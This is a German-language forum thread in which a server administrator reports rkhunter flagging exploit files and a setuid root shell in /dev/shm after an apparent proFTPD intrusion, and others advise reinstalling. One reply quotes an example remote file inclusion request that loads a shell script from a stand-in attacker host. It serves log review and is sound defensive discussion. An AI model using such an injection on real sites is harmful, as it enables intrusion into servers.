rkhunter-Warnung: Suspicious file types found in /dev:



skydrak

Member
Hallo,

vielleicht kann mir ja jemand weiterhelfen. Rkhunter hat mir heute eine Meldung ausgespuckt:

[06:27:55] Warning: Suspicious file types found in /dev:
[06:27:55] /dev/shm/foo/libpwn.c: ASCII C program text
[06:27:55] /dev/shm/foo/sh.c: ASCII C program text
[06:27:55] /dev/shm/foo/nib.sh: Bourne-Again shell script text executable
[06:27:55] /dev/shm/sh: setuid ELF 64-bit LSB executable, x86-64, version 1 (SYSV),

Nach kurzer Suche bin ich auf http://blog.nibbles.fr/2230 gestoßen.

Die Datei /etc/ld.so.preload ist leer, sprich es konnte keine Library gelinkt werden.

Die Logfiles suche ich gerade nach den Strings ab, kann aber auf Grund der enormen Datenmenge ein paar Stunden dauern.

Reicht es in diesem Fall aus die Lücke zu finden und die Dateien zu löschen, oder sollte ich das System neu aufsetzen?

Grüße
 
Reicht es in diesem Fall aus die Lücke zu finden und die Dateien zu löschen

Nein, reicht nie. Warum steht hier (letzter Absatz):
 
In den WWW-Logs konnte ich nichts finden. Der Code, bzw. die Dateien, müssen über den aktuellen Bug in proFTPD ins System übertragen worden sein. Das passt zeitlich von den Timestamps der Dateien mit den Einträgen in den Logfiles von proFTPD überein (Einbruchsversuch).
 
Vielleicht waren es auch RFI (remote file inclusion) Attacke. Schau nochmal in den Logs nach ungewoehnlichen POST aufrufen oder solche HTTP Aufrufe

Code:
Deine-seite.de/index.php?info=http://hacker-seite.de/shell.php
 
Vielleicht waren es auch RFI (remote file inclusion) Attacke. Schau nochmal in den Logs nach ungewoehnlichen POST aufrufen oder solche HTTP Aufrufe

Code:
Deine-seite.de/index.php?info=http://hacker-seite.de/shell.php

Habe die Webserver-Logs nach allen möglichen Strings abgesucht: shell, wget, sh, /dev/

Nichts dabei.
 
[06:27:55] Warning: Suspicious file types found in /dev:
[06:27:55] /dev/shm/foo/libpwn.c: ASCII C program text
[06:27:55] /dev/shm/foo/sh.c: ASCII C program text
[06:27:55] /dev/shm/foo/nib.sh: Bourne-Again shell script text executable
[06:27:55] /dev/shm/sh: setuid ELF 64-bit LSB executable, x86-64, version 1 (SYSV),

Das stinkt gewaltig nach BufferOverflow. Da wäre ne Root-Shell und gleich hinten dran etwas Binär-Code. Das würde ja bestens zum Thema ProFTP passen ...
 
Das war auch das einzige was ich finden konnte, was einigermaßen passte: Als die Dateien auf dem System erzeugt wurden, war nur in der proFTPD-Log etwas mit dem gleichen Timestamp zu finden.

Server ist jetzt neu aufgesetzt und eingerichtet. proFTPD kommt mir nicht mehr ins Haus...
 
Back
Top